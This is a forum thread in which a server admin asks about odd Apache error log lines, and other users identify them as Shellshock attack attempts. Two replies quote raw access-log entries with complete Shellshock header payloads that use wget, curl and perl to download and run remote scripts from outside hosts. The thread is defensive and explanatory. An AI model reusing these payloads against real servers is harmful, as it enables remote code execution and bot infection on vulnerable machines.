Looks like someone trying to upload files to the server
I noticed this is my apache error log.
I looked for this file that was uploaded but could not find it. How do I disable this and or what is this?
[Tue Nov 11 17:42:53.073036 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: Connecting to 209.20.86.222:80...
[Tue Nov 11 17:42:53.135079 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: connected.
[Tue Nov 11 17:42:53.135164 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: HTTP request sent, awaiting response...
[Tue Nov 11 17:42:53.197484 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 200 OK
[Tue Nov 11 17:42:53.197549 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: Length: 7488 (7.3K) [text/plain]
[Tue Nov 11 17:42:53.197583 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: Saving to: `/tmp/jack.jpg'
[Tue Nov 11 17:42:53.197596 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:
[Tue Nov 11 17:42:53.197615 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 0K ...
[Tue Nov 11 17:42:53.259697 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: ....
[Tue Nov 11 17:42:53.259778 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 100% 118K=0.06s
[Tue Nov 11 17:42:53.259793 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:
[Tue Nov 11 17:42:53.260010 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 2014-11-11 17:42:53 (118 KB/s) - `/tmp/jack.jpg' saved [7488/7488]
[Tue Nov 11 17:42:53.260030 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:
[Tue Nov 11 17:42:53.264777 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:
[Tue Nov 11 17:42:53.264817 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: curl: (3) malformed
[Tue Nov 11 17:42:53.327853 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: % Total % Received % Xferd Average Speed Time Time Time Current
[Tue Nov 11 17:42:53.328035 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: Dload Upload Total Spent Left Speed
[Tue Nov 11 17:42:53.328119 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: \r 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
[Tue Nov 11 17:42:53.453541 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: \r101 7488
[Tue Nov 11 17:42:53.453691 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 101 7488 0 0 39691 0 --:--:-- --:--:-- --:--:-- 59904I looked for this file that was uploaded but could not find it. How do I disable this and or what is this?
-
This looks like a shellshock attack attempt. It tried to download jack.jpg from a server in Germany and run it (it is a perl script) which then sets up some type of bot that may be controlled through IRC or something. I cleaned one up and updated Bash recently. Log: 165.233.46.204 - - [03/Nov/2014:11:36:19 -0500] "GET / HTTP/1.1" 302 287 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget www.freistilreisen.de/jack.jpg -O /tmp/jack.jpg;curl -O /tmp/jack.jpg www.freistilreisen.de/jack.jpg;perl /tmp/jack.jpg;rm -rf /tmp/jack.jpg*\");'"
Here's another one:81.145.204.4 - - [18/Oct/2014:07:16:45 -0400] "GET /cgi-bin/bin/view/TWiki/WebHome HTTP/1.1" 302 317 "() { :;}; /bin/bash -c \\x22cd /tmp;wget http://74.52.27.243/lifesux.txt;perl /tmp/lifesux.txt;rm -rf /tm p/lifesux.txt\\x22" "() { :;}; /bin/bash -c \\x22cd /tmp;wget http://74.52.27.243/lifesux.txt;perl /tmp/lifesux.txt;rm -rf lifesux.txt\\x22"
The telltale sign that a request is trying to exploit shellshock vulnerability in your BASH shell is the beginning function definition:() { :; }
If you have an old version of BASH, update -- might need to build from source unless your box is really new. There are lots of good sites out there that explain how to deal w/ shellshock. I found this one quite helpful:0 -
thanks guys for your answers. I will take a look. 0
Please sign in to leave a comment.
Comments
3 comments